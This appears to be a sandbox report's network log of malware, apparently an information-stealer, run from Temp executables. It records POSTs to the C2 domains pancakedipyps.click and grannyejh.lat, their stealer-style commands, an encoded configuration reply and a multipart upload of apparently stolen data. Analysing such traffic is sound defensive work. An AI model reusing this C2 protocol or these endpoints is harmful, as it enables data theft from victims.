                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1493&min_rtt=1490&rtt_var=566&sent=351&recv=592&lost=0&retrans=0&sent_bytes=2847&recv_bytes=573929&delivery_rate=1922317&cwnd=171&unsent_bytes=0&cid=0be60ad1a2574657&ts=3781&x=0"


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          7192.168.2.849725104.21.23.764437656C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-18 08:07:38 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                          Content-Length: 81
                                                                                                                                                                                          Host: pancakedipyps.click
                                                                                                                                                                                          2024-12-18 08:07:38 UTC81OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d 26 68 77 69 64 3d 38 43 36 46 35 36 34 42 31 38 36 38 32 41 43 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                          Data Ascii: act=get_message&ver=4.0&lid=FATE99--test&j=&hwid=8C6F564B18682ACBAC8923850305D13E
                                                                                                                                                                                          2024-12-18 08:07:38 UTC1035INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:07:38 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: PHPSESSID=05mmil1dbnvgfiq06mll0q8n81; expires=Sun, 13-Apr-2025 01:54:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A46kbGcUs0drm3GeTMSrDjw7NC9I%2BIYUFEyxEjvpxn5hPo4PJGzokIDMIci0MopRVrAIa1oVkfbcLFGg4%2F5%2FBTWIyZLxFIcEnsA9JNCpMDYEM5SqaVE5Ubef91u4k3x5anXrZE81"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f3da910d9b1f5f8-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1519&min_rtt=1496&rtt_var=607&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=984&delivery_rate=1737061&cwnd=57&unsent_bytes=0&cid=8a8427391e32d00f&ts=726&x=0"
                                                                                                                                                                                          2024-12-18 08:07:38 UTC54INData Raw: 33 30 0d 0a 46 76 6c 79 33 64 53 77 52 76 6d 77 47 6e 50 56 6c 67 66 36 53 52 35 57 72 75 61 6f 6b 59 57 45 74 4d 30 4c 42 6a 4e 59 56 56 5a 4e 70 41 3d 3d 0d 0a
                                                                                                                                                                                          Data Ascii: 30Fvly3dSwRvmwGnPVlgf6SR5WruaokYWEtM0LBjNYVVZNpA==
                                                                                                                                                                                          2024-12-18 08:07:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          8192.168.2.849727172.67.179.1094433060C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-18 08:07:44 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                          2024-12-18 08:07:44 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                          2024-12-18 08:07:45 UTC1042INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:07:45 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: PHPSESSID=77n3drni9kaveqlpo808amsvbm; expires=Sun, 13-Apr-2025 01:54:24 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DzEWs4%2Fie9fAUPip4jhPbsSvwBYTO%2BN6Uph%2B%2BcRYp%2FYYJNchpZ3ZQfvx3k1IyMwJuTufQ%2BiLn7zZtpO09oyLL%2FCyJ1NanUDyz%2FBBv04gOyFMNWgy1Up7dPRO%2Bln%2BKIcX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f3da93a8be20f5b-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1634&rtt_var=622&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=904&delivery_rate=1746411&cwnd=218&unsent_bytes=0&cid=7063b59ce5fc38cb&ts=741&x=0"
                                                                                                                                                                                          2024-12-18 08:07:45 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                          Data Ascii: 2ok
                                                                                                                                                                                          2024-12-18 08:07:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          9192.168.2.849728172.67.179.1094433060C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-18 08:07:46 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                          Content-Length: 52
                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                          2024-12-18 08:07:46 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 26 6a 3d
                                                                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--6989783370&j=
                                                                                                                                                                                          2024-12-18 08:07:47 UTC1030INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:07:47 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: PHPSESSID=mt7to1g4scbdvfbj7biv4127tk; expires=Sun, 13-Apr-2025 01:54:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MQC8lb4TgpHzr6gyK%2BGmN6LOsM1gJ7cKKSGYD3s9xDEw2LRPH4pCMeAUxuLWmaCXPwsF1PInQGw8J513jTygDg%2FbZoCI2tz3i2jcfNANM%2B%2FS47TF3XmNR59acYhDJiUI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f3da9470f421a1f-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1814&min_rtt=1807&rtt_var=692&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=949&delivery_rate=1566523&cwnd=228&unsent_bytes=0&cid=14557f89075094e3&ts=980&x=0"
                                                                                                                                                                                          2024-12-18 08:07:47 UTC339INData Raw: 34 39 31 63 0d 0a 71 33 61 48 6c 5a 54 44 5a 5a 50 49 50 39 42 79 76 31 32 53 77 4b 6b 44 62 6d 36 34 42 31 54 41 39 48 78 63 42 70 56 45 49 42 76 51 56 50 47 33 72 76 64 4a 73 62 74 61 38 6b 6a 4c 4c 2b 65 6c 68 53 45 50 43 70 6f 39 4d 71 47 59 44 7a 6b 71 74 7a 4a 4e 4f 5a 45 51 35 76 6e 6e 70 6b 6d 78 72 55 66 79 53 4f 51 6d 73 4b 58 48 49 56 52 4d 33 57 30 32 6f 5a 67 65 50 57 33 36 4e 45 78 34 77 78 72 67 2f 66 47 67 41 66 4b 6b 55 72 55 58 32 6a 7a 34 72 73 42 75 42 67 4f 61 4b 33 61 6c 6a 6c 35 6d 4a 4e 67 68 56 48 72 6d 46 2f 54 2b 74 72 35 4a 36 4f 70 61 76 6c 43 46 66 2f 4f 6c 79 32 38 49 43 74 4e 76 50 4b 69 51 48 7a 68 73 35 53 31 47 63 38 4d 55 34 2f 7a 37 71 52 58 2f 72 6c 57 2b 45 64 41 38 73 4f 79 4c 5a 68 52 4d 67 69 56 6c 6b 4a 55 50 4c
                                                                                                                                                                                          Data Ascii: 491cq3aHlZTDZZPIP9Byv12SwKkDbm64B1TA9HxcBpVEIBvQVPG3rvdJsbta8kjLL+elhSEPCpo9MqGYDzkqtzJNOZEQ5vnnpkmxrUfySOQmsKXHIVRM3W02oZgePW36NEx4wxrg/fGgAfKkUrUX2jz4rsBuBgOaK3aljl5mJNghVHrmF/T+tr5J6OpavlCFf/Oly28ICtNvPKiQHzhs5S1Gc8MU4/z7qRX/rlW+EdA8sOyLZhRMgiVlkJUPL
                                                                                                                                                                                          2024-12-18 08:07:47 UTC1369INData Raw: 58 42 39 74 79 46 4f 4f 5a 46 55 34 2f 6e 33 72 41 66 6a 6f 6c 61 35 46 63 38 30 2b 61 2f 47 59 51 45 47 31 57 59 32 70 5a 77 55 4d 57 37 7a 4b 30 39 2f 79 52 53 6c 75 62 61 6d 48 37 48 79 48 5a 45 56 7a 54 6a 38 74 49 6c 62 54 42 4f 55 66 48 61 6c 6d 6c 35 6d 4a 50 38 6a 51 58 72 43 47 2b 62 2f 2f 62 4d 48 34 36 78 51 74 77 4c 62 4f 76 36 6f 79 48 4d 47 41 74 78 6d 50 36 6d 66 47 7a 6c 67 74 32 67 43 66 74 46 55 76 62 66 58 72 41 7a 39 6f 45 71 79 55 4d 4a 78 36 65 4c 4d 62 55 78 55 6d 6d 45 33 70 70 63 61 4d 47 72 7a 4b 6b 52 33 78 42 76 6a 2f 66 61 6d 44 66 6d 69 58 4c 38 62 30 6a 2f 31 72 38 39 6e 41 41 33 66 4a 58 6a 69 6b 51 5a 2b 50 4c 63 49 52 58 72 62 56 74 44 30 2b 4b 38 41 35 2b 70 43 2f 41 6d 64 4f 50 7a 69 6b 79 45 43 43 64 56 33 4e 37 43 54
                                                                                                                                                                                          Data Ascii: XB9tyFOOZFU4/n3rAfjola5Fc80+a/GYQEG1WY2pZwUMW7zK09/yRSlubamH7HyHZEVzTj8tIlbTBOUfHalml5mJP8jQXrCG+b//bMH46xQtwLbOv6oyHMGAtxmP6mfGzlgt2gCftFUvbfXrAz9oEqyUMJx6eLMbUxUmmE3ppcaMGrzKkR3xBvj/famDfmiXL8b0j/1r89nAA3fJXjikQZ+PLcIRXrbVtD0+K8A5+pC/AmdOPzikyECCdV3N7CT
                                                                                                                                                                                          2024-12-18 08:07:47 UTC1369INData Raw: 39 6d 63 32 37 43 56 74 44 30 2b 4b 38 41 35 2b 70 43 2f 41 6d 64 4f 50 7a 69 6b 79 45 42 42 4e 39 67 4f 61 4f 63 45 44 74 75 2b 79 35 4d 65 74 73 62 34 66 66 36 71 51 33 38 70 46 6d 36 47 64 59 30 39 71 4c 4b 61 30 78 43 6d 6d 49 75 34 73 35 65 43 6d 50 37 4b 30 30 37 2f 42 66 72 2b 66 47 33 52 2b 37 6b 52 50 49 58 30 58 2b 6f 34 73 64 6f 44 41 66 51 59 54 61 6c 6d 78 73 39 59 2f 51 72 52 58 50 48 45 2b 48 37 2f 36 77 42 38 61 31 5a 74 77 4c 59 4e 76 79 75 69 79 39 4d 43 38 49 6c 62 75 4b 35 47 53 68 6e 32 43 56 54 63 49 6b 4c 71 2b 36 32 70 67 75 78 38 68 32 31 46 64 55 30 39 71 72 4c 63 77 6b 43 30 57 51 38 70 4a 63 54 4d 6d 4c 33 4a 30 4a 2f 78 52 54 69 38 4f 53 7a 41 76 65 34 56 2f 4a 65 6e 54 6a 6f 34 70 4d 68 4f 68 7a 4e 64 43 44 67 6f 78 30 77 61
                                                                                                                                                                                          Data Ascii: 9mc27CVtD0+K8A5+pC/AmdOPzikyEBBN9gOaOcEDtu+y5Metsb4ff6qQ38pFm6GdY09qLKa0xCmmIu4s5eCmP7K007/Bfr+fG3R+7kRPIX0X+o4sdoDAfQYTalmxs9Y/QrRXPHE+H7/6wB8a1ZtwLYNvyuiy9MC8IlbuK5GShn2CVTcIkLq+62pgux8h21FdU09qrLcwkC0WQ8pJcTMmL3J0J/xRTi8OSzAve4V/JenTjo4pMhOhzNdCDgox0wa
                                                                                                                                                                                          2024-12-18 08:07:47 UTC1369INData Raw: 39 78 78 4c 6a 2b 76 4f 75 44 65 4f 69 55 37 38 62 30 6a 54 69 6f 73 5a 6c 41 41 6a 53 62 6a 7a 69 32 46 34 35 66 4c 64 2b 41 6b 7a 45 47 2b 58 30 34 4f 45 59 76 37 4d 64 74 52 79 64 5a 37 43 75 78 57 45 44 41 4e 5a 75 50 71 4f 61 45 44 6c 68 2f 69 35 4b 61 38 67 51 37 66 62 34 72 67 62 31 72 31 69 32 46 39 6b 35 2f 2b 4b 46 49 51 73 55 6d 6a 31 32 6a 62 45 72 66 45 58 4e 5a 6c 30 33 30 46 54 69 2b 37 62 35 52 2f 32 70 55 62 6f 66 32 7a 62 38 71 4d 4a 71 41 41 66 65 61 54 2b 6e 6b 42 38 37 59 66 59 69 54 6e 50 50 46 2b 62 34 2b 61 34 50 73 65 51 64 74 51 69 64 5a 37 43 48 33 47 6f 43 43 70 70 36 65 4c 76 57 47 54 49 6b 72 32 5a 4f 63 4d 38 53 34 50 76 33 70 77 2f 30 6f 6c 6d 7a 46 74 73 38 2f 36 62 4f 59 41 4d 49 31 6d 73 38 6f 35 63 53 4e 57 76 38 49 77
                                                                                                                                                                                          Data Ascii: 9xxLj+vOuDeOiU78b0jTiosZlAAjSbjzi2F45fLd+AkzEG+X04OEYv7MdtRydZ7CuxWEDANZuPqOaEDlh/i5Ka8gQ7fb4rgb1r1i2F9k5/+KFIQsUmj12jbErfEXNZl030FTi+7b5R/2pUbof2zb8qMJqAAfeaT+nkB87YfYiTnPPF+b4+a4PseQdtQidZ7CH3GoCCpp6eLvWGTIkr2ZOcM8S4Pv3pw/0olmzFts8/6bOYAMI1ms8o5cSNWv8Iw
                                                                                                                                                                                          2024-12-18 08:07:47 UTC1369INData Raw: 34 2f 6a 77 6f 41 4c 37 70 6c 71 33 47 39 49 7a 73 4f 79 4c 5a 68 52 4d 67 69 55 59 71 59 55 4a 50 57 72 38 4d 46 6b 35 31 6c 72 38 74 2f 47 74 52 36 6e 71 58 72 6b 62 32 54 2f 38 6f 73 39 73 44 42 37 56 59 6a 47 72 6e 51 77 30 59 2f 41 74 53 6e 4c 47 45 76 66 37 2b 4c 4d 43 34 37 67 64 2f 46 44 61 4a 37 44 36 69 31 63 4c 48 4d 70 6d 64 4a 4f 41 48 53 68 76 2b 69 6f 43 5a 6f 63 4e 70 66 44 36 34 56 2b 78 72 46 4b 37 45 39 49 2b 2b 61 37 47 5a 41 55 4a 32 32 4d 79 71 4a 77 65 4f 47 4c 32 49 30 68 36 79 42 37 73 38 50 36 6d 42 4f 50 71 45 2f 49 58 78 58 2b 6f 34 75 4a 6d 48 67 4c 4b 4a 53 6e 73 6a 31 34 35 61 4c 64 2b 41 6e 33 44 47 2b 48 77 2b 71 63 43 39 36 64 63 76 52 48 64 4d 50 53 70 77 6d 63 4e 41 64 39 6f 4d 72 43 63 46 54 46 6f 2f 69 70 50 4f 59 64
                                                                                                                                                                                          Data Ascii: 4/jwoAL7plq3G9IzsOyLZhRMgiUYqYUJPWr8MFk51lr8t/GtR6nqXrkb2T/8os9sDB7VYjGrnQw0Y/AtSnLGEvf7+LMC47gd/FDaJ7D6i1cLHMpmdJOAHShv+ioCZocNpfD64V+xrFK7E9I++a7GZAUJ22MyqJweOGL2I0h6yB7s8P6mBOPqE/IXxX+o4uJmHgLKJSnsj145aLd+An3DG+Hw+qcC96dcvRHdMPSpwmcNAd9oMrCcFTFo/ipPOYd
                                                                                                                                                                                          2024-12-18 08:07:47 UTC1369INData Raw: 61 49 56 38 4b 78 50 73 68 33 58 4c 66 71 70 7a 6d 77 42 41 64 6c 6a 4d 4b 6d 61 44 44 64 6b 39 43 30 43 4e 34 6b 54 2f 62 65 75 34 53 54 6d 76 46 65 31 48 4d 73 30 38 61 48 64 62 42 78 4d 6c 43 55 6e 70 59 64 65 5a 6e 4c 6e 4d 55 56 6d 68 77 32 6c 38 50 72 68 58 37 47 73 56 4c 51 58 32 7a 48 69 70 38 31 75 41 77 58 54 59 54 36 68 6c 68 6f 36 59 2f 49 6c 54 6e 4c 4f 46 2b 72 7a 2f 36 38 4f 2f 75 6f 54 38 68 66 46 66 36 6a 69 36 6e 6f 50 41 4e 63 6c 4b 65 79 50 58 6a 6c 6f 74 33 34 43 64 63 63 52 35 66 33 77 70 51 4c 33 6f 46 69 79 47 39 34 77 39 4b 54 50 62 67 77 48 30 32 51 77 70 35 77 56 4f 47 6e 30 49 45 51 35 68 31 54 69 37 37 62 35 52 39 47 78 55 4c 34 58 6e 53 43 2b 75 34 74 6d 41 45 79 43 4a 54 32 75 6b 68 6b 2b 61 66 51 75 52 33 33 44 45 65 58 2f
                                                                                                                                                                                          Data Ascii: aIV8KxPsh3XLfqpzmwBAdljMKmaDDdk9C0CN4kT/beu4STmvFe1HMs08aHdbBxMlCUnpYdeZnLnMUVmhw2l8PrhX7GsVLQX2zHip81uAwXTYT6hlho6Y/IlTnLOF+rz/68O/uoT8hfFf6ji6noPANclKeyPXjlot34CdccR5f3wpQL3oFiyG94w9KTPbgwH02Qwp5wVOGn0IEQ5h1Ti77b5R9GxUL4XnSC+u4tmAEyCJT2ukhk+afQuR33DEeX/
                                                                                                                                                                                          2024-12-18 08:07:47 UTC1369INData Raw: 6a 71 45 2f 49 58 79 33 2b 6f 34 76 55 68 48 67 2f 4b 5a 6a 6d 7a 71 46 35 6d 66 63 6c 6d 53 57 2f 4f 42 4f 62 68 2f 61 77 4c 34 4a 51 64 36 6b 53 50 62 61 4c 77 6d 58 35 4d 45 2b 55 72 64 71 50 57 52 67 64 39 74 7a 41 43 49 5a 74 61 70 65 57 32 2b 55 65 32 71 55 2b 67 46 74 34 70 38 2b 58 31 58 79 73 61 30 47 49 6d 70 59 45 52 66 69 71 33 4b 51 49 68 38 46 54 73 38 4f 32 77 45 66 79 36 57 76 49 76 6b 33 2f 6f 34 70 4d 68 4f 51 2f 55 61 7a 47 30 68 31 4d 5a 63 76 30 68 55 6e 37 65 47 36 57 35 74 71 64 48 71 66 6b 54 38 68 54 4d 66 36 6a 79 6d 54 70 5a 58 34 30 31 5a 4c 33 59 42 33 35 79 74 33 34 51 4e 34 6b 47 70 61 2b 32 35 67 54 6a 75 46 75 78 42 74 35 34 7a 70 7a 73 65 77 45 4b 7a 58 51 49 6e 4a 45 45 4d 32 4c 67 4e 77 35 73 79 68 72 72 38 4f 44 68 53
                                                                                                                                                                                          Data Ascii: jqE/IXy3+o4vUhHg/KZjmzqF5mfclmSW/OBObh/awL4JQd6kSPbaLwmX5ME+UrdqPWRgd9tzACIZtapeW2+Ue2qU+gFt4p8+X1Xysa0GImpYERfiq3KQIh8FTs8O2wEfy6WvIvk3/o4pMhOQ/UazG0h1MZcv0hUn7eG6W5tqdHqfkT8hTMf6jymTpZX401ZL3YB35yt34QN4kGpa+25gTjuFuxBt54zpzsewEKzXQInJEEM2LgNw5syhrr8ODhS
                                                                                                                                                                                          2024-12-18 08:07:47 UTC1369INData Raw: 71 51 4a 4e 2f 39 4c 4f 4c 4f 56 78 65 67 54 42 6c 39 63 5a 4d 49 53 72 75 5a 6c 51 35 6b 55 61 72 74 2b 54 68 58 37 48 74 58 71 41 43 32 7a 7a 6d 6f 59 78 66 4d 69 76 55 59 6a 65 30 68 67 6b 78 57 73 6b 7a 51 58 66 48 45 2f 50 6d 74 75 39 48 2f 75 6f 46 69 31 43 56 66 38 2f 73 69 33 6c 4d 56 4a 70 51 4e 61 79 59 47 53 68 31 75 67 46 4d 66 73 67 43 39 65 44 35 34 55 6d 78 72 42 33 71 51 70 4e 2f 39 4c 4f 4c 4f 56 78 65 67 54 42 6c 39 63 5a 4d 49 53 72 75 5a 6c 51 35 6b 55 61 72 74 2b 54 68 58 37 48 74 58 71 41 43 32 7a 7a 6d 6f 59 78 66 4d 69 76 55 59 6a 65 30 68 67 6b 78 4b 39 6b 51 59 30 66 33 41 65 62 35 2b 4b 59 52 34 4f 6f 54 38 68 2b 64 5a 38 6e 69 67 79 45 7a 51 70 70 39 64 76 72 57 4b 7a 31 71 2b 53 46 55 61 49 51 7a 36 2f 44 33 74 78 66 6d 70 52
                                                                                                                                                                                          Data Ascii: qQJN/9LOLOVxegTBl9cZMISruZlQ5kUart+ThX7HtXqAC2zzmoYxfMivUYje0hgkxWskzQXfHE/Pmtu9H/uoFi1CVf8/si3lMVJpQNayYGSh1ugFMfsgC9eD54UmxrB3qQpN/9LOLOVxegTBl9cZMISruZlQ5kUart+ThX7HtXqAC2zzmoYxfMivUYje0hgkxK9kQY0f3Aeb5+KYR4OoT8h+dZ8nigyEzQpp9dvrWKz1q+SFUaIQz6/D3txfmpR
                                                                                                                                                                                          2024-12-18 08:07:47 UTC1369INData Raw: 44 76 32 6d 33 58 51 50 48 4e 31 62 43 49 2b 45 47 53 35 6e 74 52 64 55 65 73 6b 61 34 72 65 34 34 52 2b 78 38 68 32 66 41 74 6f 76 38 2b 4b 46 49 51 42 4d 67 69 55 37 73 4a 45 4f 50 53 6a 77 50 45 55 35 31 6c 72 38 74 2b 44 68 58 36 4c 6b 48 61 42 51 68 58 2b 33 72 4d 5a 67 44 77 4c 5a 64 79 53 6b 6c 51 67 39 49 38 6b 59 62 32 76 4f 42 4f 61 31 78 36 77 44 35 37 39 65 6f 68 66 6a 41 64 32 77 7a 48 45 50 54 76 5a 69 4f 36 36 6f 49 41 6c 31 38 44 59 41 58 38 6f 43 35 72 65 34 34 52 2b 78 38 68 32 66 41 74 6f 76 38 2b 44 6e 5a 67 45 41 6d 6e 70 34 75 39 59 49 66 6a 79 6b 61 41 4a 72 69 55 79 6c 73 50 57 7a 46 66 65 70 53 37 46 58 34 77 48 64 73 4d 78 78 44 30 37 72 61 44 4b 30 67 78 30 75 59 38 6b 59 62 32 76 4f 42 4f 61 31 30 35 74 46 77 4c 78 65 73 68 37
                                                                                                                                                                                          Data Ascii: Dv2m3XQPHN1bCI+EGS5ntRdUeska4re44R+x8h2fAtov8+KFIQBMgiU7sJEOPSjwPEU51lr8t+DhX6LkHaBQhX+3rMZgDwLZdySklQg9I8kYb2vOBOa1x6wD579eohfjAd2wzHEPTvZiO66oIAl18DYAX8oC5re44R+x8h2fAtov8+DnZgEAmnp4u9YIfjykaAJriUylsPWzFfepS7FX4wHdsMxxD07raDK0gx0uY8kYb2vOBOa105tFwLxesh7


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          10192.168.2.849730172.67.179.1094433060C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-18 08:07:49 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=FZDMAC0SGOOKKBDA2O9
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                          Content-Length: 12857
                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                          2024-12-18 08:07:49 UTC12857OUTData Raw: 2d 2d 46 5a 44 4d 41 43 30 53 47 4f 4f 4b 4b 42 44 41 32 4f 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 36 46 35 36 34 42 31 38 36 38 32 41 43 42 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 46 5a 44 4d 41 43 30 53 47 4f 4f 4b 4b 42 44 41 32 4f 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 5a 44 4d 41 43 30 53 47 4f 4f 4b 4b 42 44 41 32 4f 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39
                                                                                                                                                                                          Data Ascii: --FZDMAC0SGOOKKBDA2O9Content-Disposition: form-data; name="hwid"8C6F564B18682ACB00D57F9DDD37BE0C--FZDMAC0SGOOKKBDA2O9Content-Disposition: form-data; name="pid"2--FZDMAC0SGOOKKBDA2O9Content-Disposition: form-data; name="lid"yau6Na--69
                                                                                                                                                                                          2024-12-18 08:07:50 UTC1044INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:07:50 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: PHPSESSID=i1thfk1c7qjllt9s98fo3hh7m4; expires=Sun, 13-Apr-2025 01:54:28 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DM5EFEMJH9k%2B3XPBdahYtsg%2FtGS1U%2BUf5ZkptWg8NQZB2pyh3%2BYcFnYInbl1XOcD%2Bkp%2BPTuiHVTvs%2FxyaaJY5s8qkf3IcOhY%2F%2BgjM1ghlgATFeTeUodwS8dKWKA9yLSa"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f3da956eee84304-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1699&rtt_var=642&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2830&recv_bytes=13795&delivery_rate=1718658&cwnd=248&unsent_bytes=0&cid=1afcb37d5b19a5fe&ts=817&x=0"
